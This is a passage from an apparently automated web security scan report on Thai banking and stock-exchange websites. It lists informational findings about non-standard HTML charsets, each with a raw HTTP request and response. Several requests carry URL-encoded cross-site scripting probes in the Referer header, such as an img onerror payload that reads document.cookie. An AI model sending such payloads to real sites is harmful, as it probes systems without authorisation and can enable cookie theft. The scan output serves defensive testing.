Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.81. http://www.ktam.co.th/en/index.php/media_box.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/media_box.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/media_box.php HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:37:20 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.82. http://www.ktam.co.th/en/index.php/news.inc.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.inc.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/news.inc.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.83. http://www.ktam.co.th/en/index.php/news.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/news.php HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:37:22 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29472

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.84. http://www.ktam.co.th/en/index.php/self_discovery.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/self_discovery.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/self_discovery.php HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eaf4f8f44d0f
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:43:04 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29484

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.85. http://www.ktam.co.th/en/index.php/style/news.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/style/news.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/style/news.php HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:37:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29472

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.86. http://www.ktam.co.th/en/index.php/style/page.txt  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/index.php/style/page.txt

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.php/style/page.txt HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:50 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29474

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>
...[SNIP]...

32.87. http://www.ktam.co.th/en/news.inc.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/news.inc.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/news.inc.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:20 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 21042

<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link rel="stylesheet" href="style/page.txt" type="text/css">
<style type="text/css">
<!--
.style2 {font-size: 11px}
.style4 {col
...[SNIP]...

32.88. http://www.ktam.co.th/pop_up.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /pop_up.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /pop_up.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 597

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<title>............................ ....... ..... (.....) :- ............................</title>
<body leftmarg
...[SNIP]...

32.89. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.ktamsmarttrade.com
Path:   /FrontWeb/Home/Login.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /FrontWeb/Home/Login.aspx HTTP/1.1
Host: www.ktamsmarttrade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:53:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qa1lw355wgkcza550r3dx2z4; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=windows-874
Content-Length: 40275


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link href="../../App_Th
...[SNIP]...

32.90. https://www.ktb.co.th/internetservice/onlineAccountAction.do  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.ktb.co.th
Path:   /internetservice/onlineAccountAction.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /internetservice/onlineAccountAction.do HTTP/1.1
Host: www.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _ctout6897=1; JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _uid6897=F468DC21.1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; _cbclose=1; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094; visit_time=440; _cbclose6897=1;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:38 GMT
Content-length: 4670
Content-type: text/html;charset=windows-874
X-powered-by: JSP/2.0
Set-cookie: JSESSIONID=b5ebc541426318ffffffffb76304a653d8574; Path=/internetservice
Connection: close
Set-Cookie: BIGipServerhttps.www.ktb.co.th=1163657482.47873.0000; path=/


<html>
<link href="css/style.css" rel="stylesheet" type="text/css">
<head>
<title>
KTB - Internet Service
</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<style type="text/css" >
...[SNIP]...

32.91. https://www.newcb.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.newcb.ktb.co.th
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: www.newcb.ktb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:45 GMT
Content-length: 16312
Content-type: text/html
Last-modified: Wed, 23 Mar 2011 08:43:57 GMT
Etag: W/"3fb8-4d89b2cd"
Connection: close
Set-Cookie: BIGipServerwww.newcb.ktb.co.th_ext=2858156298.47873.0000; path=/

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<link href="ncb.css" type="text/css" rel="stylesheet"/>
<title
...[SNIP]...

32.92. http://www.scb.co.th/scb_api/scbapi.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.scb.co.th
Path:   /scb_api/scbapi.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /scb_api/scbapi.jsp?key=MjAwOTEyMTUxNjA5NDM= HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 18:02:11 GMT
Server: Apache
Set-Cookie: JSESSIONID=DA225EB116BA7C9FF264A66EC445116D; Path=/scb_api
Connection: close
Content-Type: text/html;charset=tis-620
Content-Length: 10162


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620" />
<title>
...[SNIP]...

32.93. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /cs70_banking/logon/sbuser HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.scbbusinessnet.com/

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:08 GMT
Server: IBM_HTTP_Server
Expires: 0
Set-Cookie: JSESSIONID=0000eYJXX4lFMzPC4DgxJ5qN74X:vd1tbof0;Path=/; Secure
Set-Cookie: affiliate=defaultAffiliate;Expires=Sun, 21-May-2079 15:58:16 GMT;Path=/cs70_banking
Cache-Control: no-store
Age: 3 Jun 2011 12:44:09 GMT
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 11710


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...
<meta name="CONTENT OWNER" content="www.scbbusinessnet.com">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link rel="stylesheet"
href='/cs70_banking/user/css/id_main_logon.css'
type="text/css">
...[SNIP]...

32.94. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/download

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /cs70_banking/logon/sbuser/download HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:47 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 15447


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...
<meta name="CONTENT OWNER" content="www.scbbusinessnet.com">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link rel="stylesheet"
href='/cs70_banking/user/css/id_main_logon.css'
type="text/css">
...[SNIP]...

32.95. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/information

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /cs70_banking/logon/sbuser/information HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:48 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 14996


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...
<meta name="CONTENT OWNER" content="www.scbbusinessnet.com">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link rel="stylesheet"
href='/cs70_banking/user/css/id_main_logon.css'
type="text/css">
...[SNIP]...

32.96. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/logon_th

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /cs70_banking/logon/sbuser/logon_th HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:50 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:50 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 11786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...
<meta name="CONTENT OWNER" content="www.scbbusinessnet.com">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link rel="stylesheet"
href='/cs70_banking/user/css/id_main_logon_th.css'
type="text/css">
...[SNIP]...

32.97. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/securetip

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /cs70_banking/logon/sbuser/securetip HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:52 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:58 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 15786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...
<meta name="CONTENT OWNER" content="www.scbbusinessnet.com">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link rel="stylesheet"
href='/cs70_banking/user/css/id_main_logon.css'
type="text/css">
...[SNIP]...

32.98. http://www.set.or.th/en/contact/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /en/contact/contact.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/contact/contact.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=418

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:30 GMT
Server: Apache
Last-Modified: Fri, 29 Oct 2010 10:05:11 GMT
ETag: "dc6fd-87d4-980e83c0"
Accept-Ranges: bytes
Content-Length: 34772
Content-Type: text/html

<html><!-- InstanceBegin template="/Templates/set-en.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>The Stock Exchange of Thailand: FAQs - Ab
...[SNIP]...
market, equity, bond, derivatives, etf, stock market, quotes, financial, internet trading, listed companies, IPO, regulations, broker, market data, investment information, news, investor education">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.99. http://www.set.or.th/en/index.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /en/index.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/index.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/th/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:47:51 GMT
Server: Apache
